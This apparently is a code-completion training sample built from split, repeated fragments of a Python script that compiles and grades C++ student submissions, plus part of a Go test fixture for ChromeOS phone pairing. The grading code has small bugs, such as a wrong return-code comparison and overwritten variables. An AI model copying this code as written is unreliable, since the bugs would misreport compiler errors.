if not os.path.isdir(os.path.join(tmpdir, 'build')):
os.mkdir(os.path.join(tmpdir, 'build'))
os.chdir(os.path.join(tmpdir, 'build'))
compiled, compile_msg = cpp_compile() # compile submission
if compiled:
score, output, correct, total = mark()
else:
score = 0
output = "Failed to compile"
correct = 0
total = 0
# Okay, back to the workdir for comments and shipping the mark
os.chdir(tmpdir)
options = ["Keep",
"Comment",
"Replace Grade",
"Show Compiler Output",
"Show Test Output",
"Show Comment",
"Append compiler message",
"Append Test Output",
"View Submission"]
while True:
print(f"""Marking {submissions[f]}:
Student {idx+1} / {len(details)}
Mark: {score} ({correct} / {total})""")
cidx, cmd = selectItems(options)
if cidx == 0:
break
elif cidx == 1: # Comment on file
editFile(os.path.abspath("./comments.txt"))
continue
elif cidx == 2: # Change grade
score = round(float(input("New Grade: ")), 2)
continue
elif cidx == 3:
viewData(compile_msg)
elif cidx == 4:
viewData(output)
elif cidx == 5:
viewFile(os.path.abspath("./comments.txt"))
elif cidx == 6:
appendToFile(os.path.abspath("./comments.txt"),
'\n'.join(["\n<pre>","=== [Compiler Output] =========",
compile_msg, "</pre>"]))
elif cidx == 7:
appendToFile(os.path.abspath("./comments.txt"),
'\n'.join(["\n<pre>", "=== [Test Output] =============",
output, "</pre>"]) )
elif cidx == 8:
submittedFiles = getFiles(submission_path)
if len(submittedFiles) > 1:
_, fname = selectItems(submittedFiles)
else:
fname = submittedFiles[0]
viewFile(os.path.abspath("./" + fname))
else:
print(cidx, cmd)
# Once everything is hunky dory, put away their mark and move on
details[f][-1] = score
if not os.path.isfile(os.path.abspath("./comments.txt")):
with open(os.path.abspath("./comments.txt"), 'w'):
pass # Just create it and leave
if not os.path.isdir(output_path):
os.mkdir(output_path)
shutil.copy(os.path.abspath("./comments.txt"),
os.path.join(output_path, "comments.txt"))
removeFiles(os.path.join(tmpdir, "build"), skipdirs=False)
shutil.rmtree(os.path.join(tmpdir, "tests"))
removeFiles(tmpdir, skipdirs=False)
os.chdir(cwd)
# Write grades to grade file
with open(out_gradefname, "w") as outputgrades:
csv_writer = csv.writer(outputgrades, dialect='unix')
[csv_writer.writerow(el) for el in header]
[csv_writer.writerow(details[stud]) for stud in order]
return details
# Compile submission
def cpp_compile(threads=2):
"""Compile the user submission
CMakeLists.txt should be in the cwd
:returns: True/False depending on if the program compiles
"""
cmake_ret = subprocess.run(["cmake", "../"], encoding='utf-8', stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = cmake_ret.stdout
errors = cmake_ret.stderr
output = ""
errors = ""
make_ret = subprocess.run(["make", f"-j{threads}"], encoding='utf-8', stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = make_ret.stdout
errors = make_ret.stderr
return (make_ret.returncode == 0, errors if make_ret != 0 else None)
# Mark submission loaded in tmp dir
def mark():
"""Mark student submissions using the test file
Runs "make test" in cwd
| os.environ.get('EDITOR'):
subprocess.run([os.environ.get("EDITOR"), fname])
else: # Rudimentary backup editor
lines = []
while True:
try:
line = input(">>>")
except EOFError:
break
lines.append(line)
contents = '\n'.join(lines)
with open(fname, 'w') as FILE:
FILE.write(contents)
print("\r", end='')
d | identifier_body |
mark.py | exception {e}")
# from, to (copies all files in from, to the to dir)
def copyContents(f, t):
"Copy all files in f into t dir"
[shutil.copy(os.path.join(f, p), t)
if os.path.isfile(os.path.join(f, p))
else shutil.copytree(os.path.join(f, p), os.path.join(t, p))
for p in os.listdir(f)]
## Viewer Modes
def editFile(fname):
if os.environ.get('EDITOR'):
subprocess.run([os.environ.get("EDITOR"), fname])
else: # Rudimentary backup editor
lines = []
while True:
try:
line = input(">>>")
except EOFError:
break
lines.append(line)
contents = '\n'.join(lines)
with open(fname, 'w') as FILE:
FILE.write(contents)
print("\r", end='')
def appendToFile(fname, content):
with open(fname, 'a+') as FILE:
FILE.write(content)
# Show stuff
def viewData(content):
PAGER = os.environ.get('PAGER')
if PAGER and len(content.split('\n')) > 20:
if PAGER == 'less':
subprocess.run([os.environ.get("PAGER"), '-N'], input=content.encode('utf-8'))
else:
subprocess.run([os.environ.get("PAGER")], input=content.encode('utf-8'))
else:
os.system("clear")
print(content)
# Read a file and show it
def viewFile(fname):
if os.path.isfile(fname):
with open(fname, 'r') as FILE:
viewData(FILE.read())
# Get files in a directory
def getFiles(dirc):
return [x for x in os.listdir(dirc) if x is not os.path.isdir(x)]
# Prompt user to select an item
def selectItems(itms):
prmt = '\t' + '\n\t'.join([f"({num+1}): {nm}"
for num, nm in enumerate(itms)]) + '\n [1] >>: '
while True:
i = input(prmt)
if i == '':
return (0, itms[0])
try:
select = int(i)
except ValueError:
continue
if select <= len(itms) and select > 0:
return (select-1, itms[select-1])
## Main Functions
def loadTmpDir(submissiondir, assndir, tmpdir, outputdir):
"""Load user submission to staging area
Loads the testing files into the tmpdir
Will create build folder and cd into that for compiling and marking
Calls the compile and marking functions.
If the program does not compile, the submission receives a zero and is not
passed forward to marking.
:rootdir: The root directory where the assignments are (directory with
student names)
:tmpdir: Where compilation and marking are occurring
:assndir: location where original assignment is kept
"""
# Deals with the joys of connex BS
# Copy and open grade file
in_gradefname = os.path.join(submissiondir, 'grades.csv')
out_gradefname = os.path.join(outputdir, 'grades.csv')
if not os.path.exists(in_gradefname):
print("grade.csv doesn't exist", "Re-download submissions from Connex with grade.csv included", sep="\n", file=sys.stderr)
exit(1)
with open(in_gradefname, 'r') as gradeFile:
gradeReader = csv.reader(gradeFile, delimiter=',')
l = [row for row in gradeReader]
header = l[:3]
order = [stud[1] for stud in l[3:]]
details = {stud[1]: stud for stud in l[3:]}
submissions = {username_expr.search(p).groups()[0]: p for p in os.listdir(submissiondir) if username_expr.search(p)}
assert len(details) == len(submissions) # If these don't match, panic
cwd = os.getcwd() # Store this so we can go back to it later
# And here we go with actually driving this stupid boat
for idx, f in enumerate(details):
submission_path = os.path.join(submissiondir, submissions[f], "Submission attachment(s)")
output_path = os.path.join(outputdir, submissions[f])
# If it has already been marked, show the marks and copy the comments file
if details[f][-1]:
if os.path.isfile(os.path.join(submissiondir, submissions[f], 'comments.txt')):
shutil.copy(os.path.join(submissiondir, submissions[f], 'comments.txt'), tmpdir)
resp = input(f"{f}[{details[f][-1]}] already marked: Remark? [y/N]:")
if resp.lower() != 'y':
# Copy comment file
if not os.path.isfile(os.path.abspath("./comments.txt")):
wit | if not os.path.isdir(output_path):
os.mkdir(output_path)
shutil.copy(os.path.abspath("./comments.txt"),
os.path.join(output_path, "comments.txt"))
continue
copyContents(submission_path, tmpdir)
copyContents(assndir, tmpdir) # Will overwrite anything already there
if not os.path.isdir(os.path.join(tmpdir, 'build')):
os.mkdir(os.path.join(tmpdir, 'build'))
os.chdir(os.path.join(tmpdir, 'build'))
compiled, compile_msg = cpp_compile() # compile submission
if compiled:
score, output, correct, total = mark()
else:
score = 0
output = "Failed to compile"
correct = 0
total = 0
# Okay, back to the workdir for comments and shipping the mark
os.chdir(tmpdir)
options = ["Keep",
"Comment",
"Replace Grade",
"Show Compiler Output",
"Show Test Output",
"Show Comment",
"Append compiler message",
"Append Test Output",
"View Submission"]
while True:
print(f"""Marking {submissions[f]}:
Student {idx+1} / {len(details)}
Mark: {score} ({correct} / {total})""")
cidx, cmd = selectItems(options)
if cidx == 0:
break
elif cidx == 1: # Comment on file
editFile(os.path.abspath("./comments.txt"))
continue
elif cidx == 2: # Change grade
score = round(float(input("New Grade: ")), 2)
continue
elif cidx == 3:
viewData(compile_msg)
elif cidx == 4:
viewData(output)
elif cidx == 5:
viewFile(os.path.abspath("./comments.txt"))
elif cidx == 6:
appendToFile(os.path.abspath("./comments.txt"),
'\n'.join(["\n<pre>","=== [Compiler Output] =========",
compile_msg, "</pre>"]))
elif cidx == 7:
appendToFile(os.path.abspath("./comments.txt"),
'\n'.join(["\n<pre>", "=== [Test Output] =============",
output, "</pre>"]) )
elif cidx == 8:
submittedFiles = getFiles(submission_path)
if len(submittedFiles) > 1:
_, fname = selectItems(submittedFiles)
else:
fname = submittedFiles[0]
viewFile(os.path.abspath("./" + fname))
else:
print(cidx, cmd)
# Once everything is hunky dory, put away their mark and move on
details[f][-1] = score
if not os.path.isfile(os.path.abspath("./comments.txt")):
with open(os.path.abspath("./comments.txt"), 'w'):
pass # Just create it and leave
if not os.path.isdir(output_path):
os.mkdir(output_path)
shutil.copy(os.path.abspath("./comments.txt"),
os.path.join(output_path, "comments.txt"))
removeFiles(os.path.join(tmpdir, "build"), skipdirs=False)
shutil.rmtree(os.path.join(tmpdir, "tests"))
removeFiles(tmpdir, skipdirs=False)
os.chdir(cwd)
# Write grades to grade file
with open(out_gradefname, "w") as outputgrades:
csv_writer = csv.writer(outputgrades, dialect='unix')
[csv_writer.writerow(el) for el in header]
[csv_writer.writerow(details[stud]) for stud in order]
return details
# Compile submission
def cpp_compile(threads=2):
"""Compile the user submission
CMakeLists.txt should be in the cwd
:returns: True/False depending on if the program compiles
"""
cmake_ret = subprocess.run(["cmake", "../"], encoding='utf-8', stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = cmake_ret.stdout
errors = cmake_ret.stderr
output = ""
errors = ""
make_ret = subprocess.run(["make", f"-j{threads}"], encoding='utf-8', stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = make_ret.stdout
errors = make_ret.stderr
return (make_ret.returncode == 0, errors if make_ret != 0 else None)
# Mark submission loaded in tmp dir
def mark():
"""Mark student submissions using the test file
Runs "make test" in cwd
| h open(os.path.abspath("./comments.txt"), 'w'):
pass # Just create it and leave
| conditional_block |
mark.py | an exception {e}")
# from, to (copies all files in from, to the to dir)
def copyContents(f, t):
"Copy all files in f into t dir"
[shutil.copy(os.path.join(f, p), t)
if os.path.isfile(os.path.join(f, p))
else shutil.copytree(os.path.join(f, p), os.path.join(t, p))
for p in os.listdir(f)]
## Viewer Modes
def editFile(fname):
if os.environ.get('EDITOR'):
subprocess.run([os.environ.get("EDITOR"), fname])
else: # Rudimentary backup editor
lines = []
while True:
try:
line = input(">>>")
except EOFError:
break
lines.append(line)
contents = '\n'.join(lines)
with open(fname, 'w') as FILE:
FILE.write(contents)
print("\r", end='')
def appendToFile(fname, content):
with open(fname, 'a+') as FILE:
FILE.write(content)
# Show stuff
def viewData(content):
PAGER = os.environ.get('PAGER')
if PAGER and len(content.split('\n')) > 20:
if PAGER == 'less':
subprocess.run([os.environ.get("PAGER"), '-N'], input=content.encode('utf-8'))
else:
subprocess.run([os.environ.get("PAGER")], input=content.encode('utf-8'))
else:
os.system("clear")
print(content)
# Read a file and show it
def viewFile(fname):
if os.path.isfile(fname):
with open(fname, 'r') as FILE:
viewData(FILE.read())
# Get files in a directory
def get | rc):
return [x for x in os.listdir(dirc) if x is not os.path.isdir(x)]
# Prompt user to select an item
def selectItems(itms):
prmt = '\t' + '\n\t'.join([f"({num+1}): {nm}"
for num, nm in enumerate(itms)]) + '\n [1] >>: '
while True:
i = input(prmt)
if i == '':
return (0, itms[0])
try:
select = int(i)
except ValueError:
continue
if select <= len(itms) and select > 0:
return (select-1, itms[select-1])
## Main Functions
def loadTmpDir(submissiondir, assndir, tmpdir, outputdir):
"""Load user submission to staging area
Loads the testing files into the tmpdir
Will create build folder and cd into that for compiling and marking
Calls the compile and marking functions.
If the program does not compile, the submission receives a zero and is not
passed forward to marking.
:rootdir: The root directory where the assignments are (directory with
student names)
:tmpdir: Where compilation and marking are occurring
:assndir: location where original assignment is kept
"""
# Deals with the joys of connex BS
# Copy and open grade file
in_gradefname = os.path.join(submissiondir, 'grades.csv')
out_gradefname = os.path.join(outputdir, 'grades.csv')
if not os.path.exists(in_gradefname):
print("grade.csv doesn't exist", "Re-download submissions from Connex with grade.csv included", sep="\n", file=sys.stderr)
exit(1)
with open(in_gradefname, 'r') as gradeFile:
gradeReader = csv.reader(gradeFile, delimiter=',')
l = [row for row in gradeReader]
header = l[:3]
order = [stud[1] for stud in l[3:]]
details = {stud[1]: stud for stud in l[3:]}
submissions = {username_expr.search(p).groups()[0]: p for p in os.listdir(submissiondir) if username_expr.search(p)}
assert len(details) == len(submissions) # If these don't match, panic
cwd = os.getcwd() # Store this so we can go back to it later
# And here we go with actually driving this stupid boat
for idx, f in enumerate(details):
submission_path = os.path.join(submissiondir, submissions[f], "Submission attachment(s)")
output_path = os.path.join(outputdir, submissions[f])
# If it has already been marked, show the marks and copy the comments file
if details[f][-1]:
if os.path.isfile(os.path.join(submissiondir, submissions[f], 'comments.txt')):
shutil.copy(os.path.join(submissiondir, submissions[f], 'comments.txt'), tmpdir)
resp = input(f"{f}[{details[f][-1]}] already marked: Remark? [y/N]:")
if resp.lower() != 'y':
# Copy comment file
if not os.path.isfile(os.path.abspath("./comments.txt")):
with open(os.path.abspath("./comments.txt"), 'w'):
pass # Just create it and leave
if not os.path.isdir(output_path):
os.mkdir(output_path)
shutil.copy(os.path.abspath("./comments.txt"),
os.path.join(output_path, "comments.txt"))
continue
copyContents(submission_path, tmpdir)
copyContents(assndir, tmpdir) # Will overwrite anything already there
if not os.path.isdir(os.path.join(tmpdir, 'build')):
os.mkdir(os.path.join(tmpdir, 'build'))
os.chdir(os.path.join(tmpdir, 'build'))
compiled, compile_msg = cpp_compile() # compile submission
if compiled:
score, output, correct, total = mark()
else:
score = 0
output = "Failed to compile"
correct = 0
total = 0
# Okay, back to the workdir for comments and shipping the mark
os.chdir(tmpdir)
options = ["Keep",
"Comment",
"Replace Grade",
"Show Compiler Output",
"Show Test Output",
"Show Comment",
"Append compiler message",
"Append Test Output",
"View Submission"]
while True:
print(f"""Marking {submissions[f]}:
Student {idx+1} / {len(details)}
Mark: {score} ({correct} / {total})""")
cidx, cmd = selectItems(options)
if cidx == 0:
break
elif cidx == 1: # Comment on file
editFile(os.path.abspath("./comments.txt"))
continue
elif cidx == 2: # Change grade
score = round(float(input("New Grade: ")), 2)
continue
elif cidx == 3:
viewData(compile_msg)
elif cidx == 4:
viewData(output)
elif cidx == 5:
viewFile(os.path.abspath("./comments.txt"))
elif cidx == 6:
appendToFile(os.path.abspath("./comments.txt"),
'\n'.join(["\n<pre>","=== [Compiler Output] =========",
compile_msg, "</pre>"]))
elif cidx == 7:
appendToFile(os.path.abspath("./comments.txt"),
'\n'.join(["\n<pre>", "=== [Test Output] =============",
output, "</pre>"]) )
elif cidx == 8:
submittedFiles = getFiles(submission_path)
if len(submittedFiles) > 1:
_, fname = selectItems(submittedFiles)
else:
fname = submittedFiles[0]
viewFile(os.path.abspath("./" + fname))
else:
print(cidx, cmd)
# Once everything is hunky dory, put away their mark and move on
details[f][-1] = score
if not os.path.isfile(os.path.abspath("./comments.txt")):
with open(os.path.abspath("./comments.txt"), 'w'):
pass # Just create it and leave
if not os.path.isdir(output_path):
os.mkdir(output_path)
shutil.copy(os.path.abspath("./comments.txt"),
os.path.join(output_path, "comments.txt"))
removeFiles(os.path.join(tmpdir, "build"), skipdirs=False)
shutil.rmtree(os.path.join(tmpdir, "tests"))
removeFiles(tmpdir, skipdirs=False)
os.chdir(cwd)
# Write grades to grade file
with open(out_gradefname, "w") as outputgrades:
csv_writer = csv.writer(outputgrades, dialect='unix')
[csv_writer.writerow(el) for el in header]
[csv_writer.writerow(details[stud]) for stud in order]
return details
# Compile submission
def cpp_compile(threads=2):
"""Compile the user submission
CMakeLists.txt should be in the cwd
:returns: True/False depending on if the program compiles
"""
cmake_ret = subprocess.run(["cmake", "../"], encoding='utf-8', stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = cmake_ret.stdout
errors = cmake_ret.stderr
output = ""
errors = ""
make_ret = subprocess.run(["make", f"-j{threads}"], encoding='utf-8', stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = make_ret.stdout
errors = make_ret.stderr
return (make_ret.returncode == 0, errors if make_ret != 0 else None)
# Mark submission loaded in tmp dir
def mark():
"""Mark student submissions using the test file
Runs "make test" in cwd
: | Files(di | identifier_name |
mark.py | an exception {e}")
# from, to (copies all files in from, to the to dir)
def copyContents(f, t):
"Copy all files in f into t dir"
[shutil.copy(os.path.join(f, p), t)
if os.path.isfile(os.path.join(f, p))
else shutil.copytree(os.path.join(f, p), os.path.join(t, p))
for p in os.listdir(f)]
## Viewer Modes
def editFile(fname):
if os.environ.get('EDITOR'):
subprocess.run([os.environ.get("EDITOR"), fname])
else: # Rudimentary backup editor
lines = []
while True:
try:
line = input(">>>")
except EOFError:
break
lines.append(line)
contents = '\n'.join(lines)
with open(fname, 'w') as FILE:
FILE.write(contents)
print("\r", end='')
def appendToFile(fname, content):
with open(fname, 'a+') as FILE:
FILE.write(content)
# Show stuff
def viewData(content):
PAGER = os.environ.get('PAGER')
if PAGER and len(content.split('\n')) > 20:
if PAGER == 'less':
subprocess.run([os.environ.get("PAGER"), '-N'], input=content.encode('utf-8'))
else:
subprocess.run([os.environ.get("PAGER")], input=content.encode('utf-8'))
else:
os.system("clear")
print(content)
# Read a file and show it
def viewFile(fname):
if os.path.isfile(fname):
with open(fname, 'r') as FILE:
viewData(FILE.read())
# Get files in a directory
def getFiles(dirc):
return [x for x in os.listdir(dirc) if x is not os.path.isdir(x)]
# Prompt user to select an item
def selectItems(itms):
prmt = '\t' + '\n\t'.join([f"({num+1}): {nm}"
for num, nm in enumerate(itms)]) + '\n [1] >>: '
while True:
i = input(prmt)
if i == '':
return (0, itms[0])
try:
select = int(i)
except ValueError:
continue
if select <= len(itms) and select > 0:
return (select-1, itms[select-1])
## Main Functions
def loadTmpDir(submissiondir, assndir, tmpdir, outputdir):
"""Load user submission to staging area
Loads the testing files into the tmpdir
Will create build folder and cd into that for compiling and marking
Calls the compile and marking functions.
If the program does not compile, the submission receives a zero and is not
passed forward to marking.
:rootdir: The root directory where the assignments are (directory with
student names)
:tmpdir: Where compilation and marking are occurring
:assndir: location where original assignment is kept
"""
# Deals with the joys of connex BS
# Copy and open grade file
in_gradefname = os.path.join(submissiondir, 'grades.csv')
out_gradefname = os.path.join(outputdir, 'grades.csv')
if not os.path.exists(in_gradefname):
print("grade.csv doesn't exist", "Re-download submissions from Connex with grade.csv included", sep="\n", file=sys.stderr)
exit(1)
with open(in_gradefname, 'r') as gradeFile:
gradeReader = csv.reader(gradeFile, delimiter=',')
l = [row for row in gradeReader]
header = l[:3]
order = [stud[1] for stud in l[3:]]
details = {stud[1]: stud for stud in l[3:]}
submissions = {username_expr.search(p).groups()[0]: p for p in os.listdir(submissiondir) if username_expr.search(p)}
assert len(details) == len(submissions) # If these don't match, panic
cwd = os.getcwd() # Store this so we can go back to it later
# And here we go with actually driving this stupid boat
for idx, f in enumerate(details):
submission_path = os.path.join(submissiondir, submissions[f], "Submission attachment(s)")
output_path = os.path.join(outputdir, submissions[f])
# If it has already been marked, show the marks and copy the comments file
if details[f][-1]:
if os.path.isfile(os.path.join(submissiondir, submissions[f], 'comments.txt')):
shutil.copy(os.path.join(submissiondir, submissions[f], 'comments.txt'), tmpdir)
resp = input(f"{f}[{details[f][-1]}] already marked: Remark? [y/N]:")
if resp.lower() != 'y':
# Copy comment file
if not os.path.isfile(os.path.abspath("./comments.txt")):
with open(os.path.abspath("./comments.txt"), 'w'):
pass # Just create it and leave
if not os.path.isdir(output_path):
os.mkdir(output_path)
shutil.copy(os.path.abspath("./comments.txt"),
os.path.join(output_path, "comments.txt"))
continue
copyContents(submission_path, tmpdir)
copyContents(assndir, tmpdir) # Will overwrite anything already there
if not os.path.isdir(os.path.join(tmpdir, 'build')):
os.mkdir(os.path.join(tmpdir, 'build'))
os.chdir(os.path.join(tmpdir, 'build'))
compiled, compile_msg = cpp_compile() # compile submission
if compiled:
score, output, correct, total = mark()
else:
score = 0
output = "Failed to compile"
correct = 0
total = 0
# Okay, back to the workdir for comments and shipping the mark
os.chdir(tmpdir)
options = ["Keep",
"Comment",
"Replace Grade",
"Show Compiler Output",
"Show Test Output",
"Show Comment",
"Append compiler message",
"Append Test Output",
"View Submission"]
while True:
print(f"""Marking {submissions[f]}:
Student {idx+1} / {len(details)}
Mark: {score} ({correct} / {total})""")
cidx, cmd = selectItems(options)
if cidx == 0:
break
elif cidx == 1: # Comment on file
editFile(os.path.abspath("./comments.txt"))
continue
elif cidx == 2: # Change grade
score = round(float(input("New Grade: ")), 2)
continue
elif cidx == 3:
viewData(compile_msg)
elif cidx == 4:
viewData(output)
elif cidx == 5:
viewFile(os.path.abspath("./comments.txt"))
elif cidx == 6:
appendToFile(os.path.abspath("./comments.txt"),
'\n'.join(["\n<pre>","=== [Compiler Output] =========",
compile_msg, "</pre>"])) | elif cidx == 8:
submittedFiles = getFiles(submission_path)
if len(submittedFiles) > 1:
_, fname = selectItems(submittedFiles)
else:
fname = submittedFiles[0]
viewFile(os.path.abspath("./" + fname))
else:
print(cidx, cmd)
# Once everything is hunky dory, put away their mark and move on
details[f][-1] = score
if not os.path.isfile(os.path.abspath("./comments.txt")):
with open(os.path.abspath("./comments.txt"), 'w'):
pass # Just create it and leave
if not os.path.isdir(output_path):
os.mkdir(output_path)
shutil.copy(os.path.abspath("./comments.txt"),
os.path.join(output_path, "comments.txt"))
removeFiles(os.path.join(tmpdir, "build"), skipdirs=False)
shutil.rmtree(os.path.join(tmpdir, "tests"))
removeFiles(tmpdir, skipdirs=False)
os.chdir(cwd)
# Write grades to grade file
with open(out_gradefname, "w") as outputgrades:
csv_writer = csv.writer(outputgrades, dialect='unix')
[csv_writer.writerow(el) for el in header]
[csv_writer.writerow(details[stud]) for stud in order]
return details
# Compile submission
def cpp_compile(threads=2):
"""Compile the user submission
CMakeLists.txt should be in the cwd
:returns: True/False depending on if the program compiles
"""
cmake_ret = subprocess.run(["cmake", "../"], encoding='utf-8', stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = cmake_ret.stdout
errors = cmake_ret.stderr
output = ""
errors = ""
make_ret = subprocess.run(["make", f"-j{threads}"], encoding='utf-8', stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = make_ret.stdout
errors = make_ret.stderr
return (make_ret.returncode == 0, errors if make_ret != 0 else None)
# Mark submission loaded in tmp dir
def mark():
"""Mark student submissions using the test file
Runs "make test" in cwd
: | elif cidx == 7:
appendToFile(os.path.abspath("./comments.txt"),
'\n'.join(["\n<pre>", "=== [Test Output] =============",
output, "</pre>"]) ) | random_line_split |
fixture.go | ("Failed to start Chrome: ", err)
}
f.cr = cr
tconn, err := cr.TestAPIConn(ctx)
if err != nil {
s.Fatal("Creating test API connection failed: ", err)
}
f.tconn = tconn
defer faillog.DumpUITreeWithScreenshotOnError(cleanupCtx, s.OutDir(), s.HasError, cr, "fixture")
// Capture a bug report on the Android phone if any onboarding/setup fails.
defer func() {
if s.HasError() {
if err := BugReport(ctx, androidDevice.Device, s.OutDir()); err != nil {
s.Log("Failed to save Android bug report: ", err)
}
}
}()
// Capture btsnoop logs during fixture setup to have adequate logging during the onboarding phase.
btsnoopCmd := bluetooth.StartBTSnoopLogging(ctx, filepath.Join(s.OutDir(), "crossdevice-fixture-btsnoop.log"))
if err := btsnoopCmd.Start(); err != nil {
s.Fatal("Failed to start btsnoop logging: ", err)
}
defer btsnoopCmd.Wait()
defer btsnoopCmd.Kill()
// Enable bluetooth debug logging.
levels := bluetooth.LogVerbosity{
Bluez: true,
Kernel: true,
}
if err := bluetooth.SetDebugLogLevels(ctx, levels); err != nil {
return errors.Wrap(err, "failed to enable bluetooth debug logging")
}
// Phone and Chromebook will not be paired if we are not signed in to the Chromebook yet.
if !f.noSignIn {
// Sometimes during login the tcp connection to the snippet server on Android is lost.
// If the Pair RPC fails, reconnect to the snippet server and try again.
if err := f.PairWithAndroid(ctx, tconn, cr); err != nil {
s.Fatal("Pairing with Android failed: ", err)
}
if f.allFeatures {
// Wait for the "Smart Lock is turned on" notification to appear,
// since it will cause Phone Hub to close if it's open before the notification pops up.
if _, err := ash.WaitForNotification(ctx, tconn, 30*time.Second, ash.WaitTitleContains("Smart Lock is turned on")); err != nil {
s.Log("Smart Lock notification did not appear after 30 seconds, proceeding anyways")
}
if err := phonehub.Enable(ctx, tconn, cr); err != nil {
s.Fatal("Failed to enable Phone Hub: ", err)
}
if err := phonehub.Hide(ctx, tconn); err != nil {
s.Fatal("Failed to hide Phone Hub after enabling it: ", err)
}
if err := androidDevice.EnablePhoneHubNotifications(ctx); err != nil {
s.Fatal("Failed to enable Phone Hub notifications: ", err)
}
}
if _, err := ash.WaitForNotification(ctx, tconn, 90*time.Second, ash.WaitTitleContains("Connected to")); err != nil {
s.Fatal("Did not receive notification that Chromebook and Phone are paired")
}
}
// Store Android attributes for reporting.
androidAttributes, err := androidDevice.GetAndroidAttributes(ctx)
if err != nil {
s.Fatal("Failed to get Android attributes for reporting: ", err)
}
f.androidAttributes = androidAttributes
// Store CrOS test metadata for reporting.
crosAttributes, err := GetCrosAttributes(ctx, tconn, crosUsername)
if err != nil {
s.Fatal("Failed to get CrOS attributes for reporting: ", err)
}
f.crosAttributes = crosAttributes
// Get the user's Download path for saving screen recordings.
f.downloadsPath, err = cryptohome.DownloadsPath(ctx, f.cr.NormalizedUser())
if err != nil {
s.Fatal("Failed to get user's Downloads path: ", err)
}
// Lock chrome after all Setup is complete so we don't block other fixtures.
if f.lockFixture {
chrome.Lock()
}
return &FixtData{
Chrome: cr,
TestConn: tconn,
AndroidDevice: androidDevice,
Username: crosUsername,
Password: crosPassword,
ChromeOptions: opts,
}
}
func (f *crossdeviceFixture) TearDown(ctx context.Context, s *testing.FixtState) {
if f.lockFixture {
chrome.Unlock()
if err := f.cr.Close(ctx); err != nil {
s.Log("Failed to close Chrome connection: ", err)
}
}
f.cr = nil
}
func (f *crossdeviceFixture) Reset(ctx context.Context) error {
if err := f.cr.Responded(ctx); err != nil {
return errors.Wrap(err, "existing Chrome connection is unusable")
}
if err := f.cr.ResetState(ctx); err != nil {
return errors.Wrap(err, "failed resetting existing Chrome session")
}
return nil
}
func (f *crossdeviceFixture) PreTest(ctx context.Context, s *testing.FixtTestState) {
if err := saveDeviceAttributes(f.crosAttributes, f.androidAttributes, filepath.Join(s.OutDir(), "device_attributes.json")); err != nil {
s.Error("Failed to save device attributes: ", err)
}
f.btsnoopCmd = bluetooth.StartBTSnoopLogging(s.TestContext(), filepath.Join(s.OutDir(), "crossdevice-btsnoop.log"))
if err := f.btsnoopCmd.Start(); err != nil {
s.Fatal("Failed to start btsnoop logging: ", err)
}
if f.logMarker != nil {
s.Log("A log marker is already created but not cleaned up")
}
logMarker, err := logsaver.NewMarker(f.cr.LogFilename())
if err == nil {
f.logMarker = logMarker
} else {
s.Log("Failed to start the log saver: ", err)
}
timestamp, err := f.androidDevice.Device.LatestLogcatTimestamp(ctx)
if err != nil {
s.Fatal("Failed to get latest logcat timestamp: ", err)
}
f.logcatStartTime = timestamp
if f.saveScreenRecording {
if f.kb == nil {
// Use virtual keyboard since uiauto.StartRecordFromKB assumes F5 is the overview key.
kb, err := input.VirtualKeyboard(ctx)
if err != nil {
s.Fatal("Failed to setup keyboard for screen recording: ", err)
}
f.kb = kb
}
if err := uiauto.StartRecordFromKB(ctx, f.tconn, f.kb, f.downloadsPath); err != nil {
s.Fatal("Failed to start screen recording on CrOS: ", err)
}
saveScreen, err := f.androidDevice.StartScreenRecording(s.TestContext(), "android-screen", s.OutDir())
if err != nil {
s.Fatal("Failed to start screen recording on Android: ", err)
}
f.saveAndroidScreenRecordingOnError = saveScreen
}
}
func (f *crossdeviceFixture) PostTest(ctx context.Context, s *testing.FixtTestState) {
if err := f.btsnoopCmd.Kill(); err != nil {
s.Error("Failed to stop btsnoop log capture: ", err)
}
f.btsnoopCmd.Wait()
f.btsnoopCmd = nil
if f.logMarker != nil {
if err := f.logMarker.Save(filepath.Join(s.OutDir(), "chrome.log")); err != nil {
s.Log("Failed to store per-test log data: ", err)
}
f.logMarker = nil
}
// Restore connection to the ADB-over-WiFi device if it was lost during the test.
// This is needed for Instant Tether tests that disable WiFi on the Chromebook which interrupts the ADB connection.
if PhoneIP.Value() != "" && f.androidDevice.Device.IsConnected(ctx) != nil {
s.Log("Connection to ADB device lost, restaring")
device, err := AdbOverWifi(ctx)
if err != nil {
s.Fatal("Failed to re-initialize adb-over-wifi: ", err)
}
f.androidDevice.Device = device
if err := f.androidDevice.ReconnectToSnippet(ctx); err != nil {
s.Fatal("Failed to reconnect to the snippet: ", err)
}
}
if err := f.androidDevice.Device.DumpLogcatFromTimestamp(ctx, filepath.Join(s.OutDir(), "crossdevice-logcat.txt"), f.logcatStartTime); err != nil {
s.Fatal("Failed to save logcat logs from the test: ", err)
}
if err := f.androidDevice.DumpLogs(ctx, s.OutDir(), "crossdevice-persistent-logcat.txt"); err != nil {
s.Fatal("Failed to save persistent logcat logs: ", err)
}
if f.saveScreenRecording {
if err := f.saveAndroidScreenRecordingOnError(ctx, s.HasError); err != nil {
s.Fatal("Failed to save Android screen recording: ", err)
}
f.saveAndroidScreenRecordingOnError = nil
ui := uiauto.New(f.tconn)
var crosRecordErr error
if err := ui.Exists(uiauto.ScreenRecordStopButton)(ctx); err != nil | {
// Smart Lock tests automatically stop the screen recording when they lock the screen.
// The screen recording should still exist though.
crosRecordErr = uiauto.SaveRecordFromKBOnError(ctx, f.tconn, s.HasError, s.OutDir(), f.downloadsPath)
} | conditional_block | |
fixture.go | on")); err != nil {
s.Log("Smart Lock notification did not appear after 30 seconds, proceeding anyways")
}
if err := phonehub.Enable(ctx, tconn, cr); err != nil {
s.Fatal("Failed to enable Phone Hub: ", err)
}
if err := phonehub.Hide(ctx, tconn); err != nil {
s.Fatal("Failed to hide Phone Hub after enabling it: ", err)
}
if err := androidDevice.EnablePhoneHubNotifications(ctx); err != nil {
s.Fatal("Failed to enable Phone Hub notifications: ", err)
}
}
if _, err := ash.WaitForNotification(ctx, tconn, 90*time.Second, ash.WaitTitleContains("Connected to")); err != nil {
